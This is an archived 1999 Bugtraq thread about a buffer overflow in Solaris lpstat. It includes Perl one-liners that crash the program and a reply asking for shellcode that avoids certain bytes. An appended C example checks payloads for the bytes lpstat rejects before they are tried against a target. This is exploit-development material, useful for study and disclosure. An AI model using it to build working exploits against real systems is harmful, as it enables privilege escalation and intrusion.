Re: Buffer overflow in Solaris 2.6/2.7 /usr/bin/lpstat
GANG WANG (gang_w@goselecttech.com), Mon, 8 Feb 1999 19:55:38 -0800
- Next message: Patrick Oonk: "Cyrix crash - FreeBSD"
- Previous message: BVE: "Re: ISS Internet Scanner Cannot be relied upon for conclusive"
- Maybe in reply to: plasmoid deep/thc/clb: "Buffer overflow in Solaris 2.6/2.7 /usr/bin/lpstat"
Neither do some other characters like \t ... It seems lpstat uses sscanf or something like that to get its parameters.

G.

-----Original Message-----
From: GANG WANG <gang_w@goselecttech.com>
To: plasmoid deep/thc/clb <plasmoid@PIMMEL.COM>; BUGTRAQ@NETSPACE.ORG <BUGTRAQ@NETSPACE.ORG>
Date: Monday, February 08, 1999 6:31 PM
Subject: Re: Buffer overflow in Solaris 2.6/2.7 /usr/bin/lpstat

>Things are a little different on Solaris 2.6 Sparc. lpstat only
>accepts a buffer which doesn't contain \x20, \x0a or \x3b.
>Can somebody teach me how to write a shellcode on Solaris Sparc
>without those characters? I feel that I'm so stupid :-(
>
>G.
>
>-----Original Message-----
>From: plasmoid deep/thc/clb <plasmoid@PIMMEL.COM>
>To: BUGTRAQ@NETSPACE.ORG <BUGTRAQ@NETSPACE.ORG>
>Date: Wednesday, January 27, 1999 11:16 AM
>Subject: Buffer overflow in Solaris 2.6/2.7 /usr/bin/lpstat
>
>
>>
>>On Aug/25/98 Sun released the following patches for lp:
>>
>> Solaris2.6 Sparc: 106235-02
>> Solaris2.6 x86: 106236
>>
>>It is quite sad that they did not fix another overflow in
>>/usr/bin/lpstat. I tested this bug on both Solaris 2.7 x86
>>and 2.6 Sparc; I assume that it is also present on Solaris 2.6
>>x86 and 2.7 Sparc.
>>
>>Solaris 2.7 x86
>>% plasmoid@gorkie:foo> lpstat -c `perl -e 'print "A" x 998'`
>>% UX:lpstat: ERROR: Class
>> [...]
>>% AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" does
>>% not exist.
>>% TO FIX: Use the "lpstat -c all" command to list
>>% all known classes.
>>% Segmentation Fault
>>% plasmoid@gorkie:foo>
>>
>>Solaris 2.6 Sparc
>>% plasmoid@bock:foo> lpstat -c `perl -e 'print "AAAA" x 250'`
>>% UX:lpstat: ERROR: Class
>> [...]
>>% AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" does not
>>% exist.
>>% TO FIX: Use the "lpstat -c all" command to list
>>% all known classes.
>>% Segmentation Fault
>>% plasmoid@bock:foo>
>>
>>This overflow is definitely exploitable; I attached the exploit for
>>Solaris x86. Quality patches for all Solaris versions can be obtained
>>from www.hert.org, a fast security source.
>>
>>plasmoid deep/thc/clb
>>http://thc.inferno.tusculum.edu
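The question in this thread is really a bad-byte problem: the reply reports that lpstat drops any argument containing \x20, \x0a, \x3b or \t, and guesses that an sscanf-style parser is the reason. The following C is an added example and is not code from either poster or from THC. It does two things a practitioner would want before worrying about the shellcode itself: scan a candidate payload for the byte set the thread reports as rejected, and show how a "%s" conversion in sscanf cuts an argument at the first whitespace byte, which accounts for the space, newline and tab observations (the semicolon is not whitespace, so that rejection must come from something else in lpstat; the example treats the forbidden set as data taken from the thread, not as something derived from sscanf). The function names and the sample payload are constructed for the example.

```c
/* Added example, not from the original Bugtraq post.
 * The rejected-byte set below is taken from the thread; the checks
 * themselves are an assumption about how one would vet a payload
 * before handing it to lpstat. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Bytes the thread reports lpstat will not accept in its argument:
 * space, newline, semicolon and tab. */
static const unsigned char BAD_BYTES[] = { 0x20, 0x0a, 0x3b, 0x09 };

/* Return the offset of the first rejected byte in buf[0..len),
 * or -1 if the buffer contains none of them. */
long scan_bad_bytes(const unsigned char *buf, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        for (size_t j = 0; j < sizeof BAD_BYTES; j++) {
            if (buf[i] == BAD_BYTES[j])
                return (long)i;
        }
    }
    return -1;
}

/* Model of an sscanf("%s") parameter parser: "%s" skips leading
 * whitespace and stops at the next whitespace byte (0x20, 0x09, 0x0a,
 * 0x0b, 0x0c, 0x0d), so everything after that byte is silently lost.
 * Returns how many bytes of arg such a parser would actually keep. */
size_t first_token_len(const char *arg)
{
    char tok[512];
    /* Width limit keeps the model itself from overflowing tok. */
    if (sscanf(arg, "%511s", tok) != 1)
        return 0;
    return strlen(tok);
}

int main(void)
{
    /* Constructed sample: 16 'A' bytes, a tab, then 15 more 'A' bytes. */
    const unsigned char payload[] = "AAAAAAAAAAAAAAAA\tAAAAAAAAAAAAAAA";
    size_t len = sizeof payload - 1;

    long off = scan_bad_bytes(payload, len);
    if (off >= 0)
        printf("byte 0x%02x at offset %ld would be rejected\n",
               payload[off], off);              /* offset 16 */
    else
        printf("no rejected bytes in %zu-byte payload\n", len);

    printf("an sscanf(\"%%s\") parser would keep %zu of %zu bytes\n",
           first_token_len((const char *)payload), len); /* 16 of 31 */
    return 0;
}
```

Run the scanner over the assembled payload (return address included) before testing against the target; a hit from scan_bad_bytes means the argument will never reach the overflow as written, regardless of what the shellcode does.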